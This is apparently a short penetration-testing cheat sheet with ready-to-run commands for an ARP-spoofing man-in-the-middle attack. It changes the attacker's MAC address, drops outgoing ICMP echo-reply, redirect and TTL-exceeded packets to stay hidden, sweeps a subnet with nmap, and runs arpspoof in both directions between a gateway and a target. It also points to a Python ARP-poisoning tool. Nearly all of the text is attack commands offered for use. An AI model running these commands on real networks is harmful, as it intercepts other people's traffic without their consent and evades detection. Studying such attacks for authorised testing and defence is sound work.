• Change the MAC address of the attacker if we can.

    ip link set dev "interface" address xx:xx:xx:xx:xx:xx
    
  • Block any ICMP echo reply, redirect & TTL exceeded output.

    iptables -A OUTPUT -p icmp --icmp-type 0 -j DROP
    iptables -A OUTPUT -p icmp --icmp-type 5 -j DROP
    iptables -A OUTPUT -p icmp --icmp-type 11 -j DROP
    
  • Run arpspoof.

    nmap -sP "IP/subnet" # search the specified subnet for live hosts
    
    arpspoof -i "interface" -t "gatewayIP" "targetIP"
    arpspoof -i "interface" -t "targetIP" "gatewayIP"
    
    # Or
    python3 arpspoof.py -i "interface" --gatewayip "gatewayIP" "targetIP" -f
    
  • Another ARP spoofing tool written in Python.

    GitHub - EONRaider/Arp-Spoofer: A pure-Python ARP Cache Poisoning (a.k.a "ARP Spoofing") tool